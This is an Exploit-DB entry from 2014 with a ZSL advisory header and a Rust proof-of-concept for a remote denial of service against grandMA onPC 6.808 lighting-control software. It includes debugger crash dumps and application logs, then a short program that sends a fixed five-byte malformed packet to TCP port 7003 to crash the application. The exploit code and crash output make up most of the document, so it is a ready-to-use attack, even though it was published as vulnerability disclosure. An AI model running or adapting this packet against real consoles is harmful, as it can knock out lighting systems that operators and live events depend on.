MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service

EDB-ID:

32704

CVE:



Author:

LiquidWorm

Type:

dos


Platform:

Windows

Date:

2014-04-05


/*

MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit


Vendor: MA Lighting Technology GmbH
Product web page: http://www.malighting.com
Affected version: grandMA series 1 onPC Software 6.808 (6.801)

Summary: The grandMA onPC software incorporates all functions of a grandMA
console and offers you its full potential on your notebook or PC. You can
use grandMA onPC for running, programming or offline pre-programming, as
well as a smart backup solution within the grandMA system. With the MA onPC
command wing and MA onPC fader wing MA Lighting has developed a sophisticated
hardware extension perfectly suited for the grandMA onPC software.

Desc: grandMA onPC version 6.808 is exposed to a remote denial of service
issue when processing socket connection negotiation. This issue occurs when
the application handles a single malformed packet over TCP port 7003, resulting
in a crash.

===========================================================================

(1324.be4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b
eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlEnterCriticalSection+0x12:
77ce22c2 f00fba3000      lock btr dword ptr [eax],0   ds:002b:3535393f=????????

--

303.640 GMA : RR NEW  STATION IN NETWORK 127.0.0.1(100) AS Standalone
367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1
367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY !
367.180 CC  : ******* EXCEPTION **************************
367.180 CC  : * ACCESS_VIOLATION
367.180 CC  : * EAX = 37363341  EBX =  6D856B0
367.180 CC  : * ECX = 37363339  EDX =  B78F41C
367.180 CC  : * ESI = 37363341  EDI = 3736333D
367.180 CC  : * DESKTYP : GMA [Windows]
367.180 CC  : * VERSION : 6.808 STREAMING : 6801
367.180 CC  : ********************************************
367.240 CC  : 0x775522c2 RtlEnterCriticalSection() + 0x12

===========================================================================


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5183
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php


31.03.2014

*/


use std::io::net::ip::SocketAddr;
use std::io::net::tcp::TcpStream;

fn bann() {
	println!("
	+======================================+
	| grandMA onPC 6.808 Denial of Service |
	|--------------------------------------|
	|                                      |
	|           ID: ZSL-2014-5183          |
	+======================================+
	");
}

fn main() {
	bann();
	println!("\n[*] Sending packet to local host on tcp port 7003\n");
	let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap();
	let mut socket = TcpStream::connect(addr).unwrap();
	socket.write(bytes!("\x74\x30\x30\x74\x21"));
	println!("[*] Crashed!\n");
}